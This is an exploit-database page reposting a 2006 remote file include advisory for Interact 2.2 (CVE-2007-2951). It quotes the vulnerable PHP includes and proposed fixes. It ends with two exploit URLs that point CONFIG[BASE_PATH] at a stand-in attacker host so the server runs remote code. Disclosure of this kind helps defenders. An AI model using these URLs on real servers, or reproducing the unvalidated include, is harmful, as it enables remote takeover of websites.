interact <= 2.2 (CONFIG[BASE_PATH]) Remote File Include Vulnerability
CVE
Category
Price
Severity
CVE-2007-2951
CWE-98
Not specified
High
Author
Risk
Exploitation Type
Date
Ibid
High
Remote
2006-09-04
CPE PURL
cpe:cpe:/a:interact:interact:2.2 pkg:pkg:exploit/interact-2-2-config-base-path-remote-file-include-vulnerability
CVSS vector description
Metric
Value
Metric Description
Value Description
Our sensors found this exploit at: http://cxsecurity.com/ascii/WLB-2006080178 Below is a copy: /*
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
- - - [Romanian Electronic Network Security Lab Team ThE Best Romanian Hacking Team] - -
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
- Cce-interact <= 2.2.0 (CONFIG[BASE_PATH]) Remote File Include Vulnerability
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
- [Script name: Interact - Online Learning and Collaboration System v. 2.2.0
- [Script site: https://sourceforge.net/projects/cce-interact/
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
- Find by: CarcaBot
+
- Contact: CarcaBotx (at) yahoo (dot) com [email concealed]
- or
- http://Hacking.CarcaBot.ro
+
+~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
+
- Special Greetz: CarcaBot
- http://Hacking.CarcaBot.ro
-
+
*/
/*
vulnerable code => admin/autoprompter.php line 33-38:
....
require_once($CONFIG['BASE_PATH'].'/modules/forum/autoprompt/prompt.inc.
php');
require_once($CONFIG['LANGUAGE_CPATH'].'/forum_strings.inc.php');
$rs = $CONN->Execute("SELECT {$CONFIG['DB_PREFIX']}posts.post_key,
{$CONFIG['DB_PREFIX']}ModuleSpaceLinks.SpaceKey,
{$CONFIG['DB_PREFIX']}ModuleSpaceLinks.GroupKey,
{$CONFIG['DB_PREFIX']}ForumThreadManagement.NumberToPrompt,
{$CONFIG['DB_PREFIX']}posts.subject,
{$CONFIG['DB_PREFIX']}posts.body,{$CONFIG['DB_PREFIX']}posts.module_key,
{$CONFIG['DB_PREFIX']}posts.thread_key,{$CONFIG['DB_PREFIX']}ForumThread
Management.MinimumReplies,{$CONFIG['DB_PREFIX']}Spaces.Name,
{$CONFIG['DB_PREFIX']}posts.added_by_key FROM
{$CONFIG['DB_PREFIX']}posts,{$CONFIG['DB_PREFIX']}ModuleSpaceLinks,{$CON
FIG['DB_PREFIX']}ForumThreadManagement,{$CONFIG['DB_PREFIX']}Spaces
LEFT JOIN {$CONFIG['DB_PREFIX']}postsAutoPrompts ON
{$CONFIG['DB_PREFIX']}ForumThreadManagement.Postkey={$CONFIG['DB_PREFIX'
]}postsAutoPrompts.post_key
WHERE
{$CONFIG['DB_PREFIX']}ForumThreadManagement.PostKey={$CONFIG['DB_PREFIX'
]}posts.post_key
AND
{$CONFIG['DB_PREFIX']}posts.module_key={$CONFIG['DB_PREFIX']}ModuleSpace
Links.ModuleKey
AND
{$CONFIG['DB_PREFIX']}ModuleSpaceLinks.SpaceKey={$CONFIG['DB_PREFIX']}Sp
aces.SpaceKey
AND
{$CONFIG['DB_PREFIX']}posts.date_added<DATE_SUB(CURRENT_DATE,INTERVAL
{$CONFIG['DB_PREFIX']}ForumThreadManagement.DaysToWait DAY) AND
{$CONFIG['DB_PREFIX']}postsAutoPrompts.post_key IS NULL ORDER BY
{$CONFIG['DB_PREFIX']}posts.post_key");
....
Fix Exploit:
admin/autoprompter.php line 33-38:
....
require_once('../local/config.inc.php');
require_once($CONFIG['BASE_PATH'].'/modules/forum/autoprompt/prompt.inc.
php');
require_once($CONFIG['LANGUAGE_CPATH'].'/forum_strings.inc.php');
$rs = $CONN->Execute("SELECT {$CONFIG['DB_PREFIX']}posts.post_key,
{$CONFIG['DB_PREFIX']}ModuleSpaceLinks.SpaceKey,
{$CONFIG['DB_PREFIX']}ModuleSpaceLinks.GroupKey,
{$CONFIG['DB_PREFIX']}ForumThreadManagement.NumberToPrompt,
{$CONFIG['DB_PREFIX']}posts.subject,
{$CONFIG['DB_PREFIX']}posts.body,{$CONFIG['DB_PREFIX']}posts.module_key,
{$CONFIG['DB_PREFIX']}posts.thread_key,{$CONFIG['DB_PREFIX']}ForumThread
Management.MinimumReplies,{$CONFIG['DB_PREFIX']}Spaces.Name,
{$CONFIG['DB_PREFIX']}posts.added_by_key FROM
{$CONFIG['DB_PREFIX']}posts,{$CONFIG['DB_PREFIX']}ModuleSpaceLinks,{$CON
FIG['DB_PREFIX']}ForumThreadManagement,{$CONFIG['DB_PREFIX']}Spaces
LEFT JOIN {$CONFIG['DB_PREFIX']}postsAutoPrompts ON
{$CONFIG['DB_PREFIX']}ForumThreadManagement.Postkey={$CONFIG['DB_PREFIX'
]}postsAutoPrompts.post_key
WHERE
{$CONFIG['DB_PREFIX']}ForumThreadManagement.PostKey={$CONFIG['DB_PREFIX'
]}posts.post_key
AND
{$CONFIG['DB_PREFIX']}posts.module_key={$CONFIG['DB_PREFIX']}ModuleSpace
Links.ModuleKey
AND
{$CONFIG['DB_PREFIX']}ModuleSpaceLinks.SpaceKey={$CONFIG['DB_PREFIX']}Sp
aces.SpaceKey
AND
{$CONFIG['DB_PREFIX']}posts.date_added<DATE_SUB(CURRENT_DATE,INTERVAL
{$CONFIG['DB_PREFIX']}ForumThreadManagement.DaysToWait DAY) AND
{$CONFIG['DB_PREFIX']}postsAutoPrompts.post_key IS NULL ORDER BY
{$CONFIG['DB_PREFIX']}posts.post_key");
....
vulnerable code => includes/common.inc.php line 35-40:
....
$CONFIG['ADODB_PATH'] = $CONFIG['BASE_PATH'].'/includes/adodb';
//Include database abstraction classes
require_once($CONFIG['ADODB_PATH'].'/adodb.inc.php');
require_once($CONFIG['ADODB_PATH'].'/session/adodb-session.php');
....
Exploit Fix:
includes/common.inc.php line 35-40:
....
require_once('../local/config.inc.php');
$CONFIG['ADODB_PATH'] = $CONFIG['BASE_PATH'].'/includes/adodb';
//Include database abstraction classes
require_once($CONFIG['ADODB_PATH'].'/adodb.inc.php');
require_once($CONFIG['ADODB_PATH'].'/session/adodb-session.php');
*/
#Exploit:
http://www.site.com/[Cce-interact_path]/admin/autoprompter.php?CONFIG[BA
SE_PATH]=[http://www.myevilsite.com/evil_scripts.txt]
http://www.site.com/[Cce-interact_path]/includes/common.inc.php?CONFIG[B
ASE_PATH]=[http://www.myevilsite.com/evil_scripts.txt]
### End of File ###
### http://Hacking.CarcaBot.ro ###
Copyright ©2024 Exploitalert.
This information is provided for TESTING and LEGAL RESEARCH purposes only. All trademarks used are properties of their respective owners. By visiting this website you agree to Terms of Use and Privacy Policy and Impressum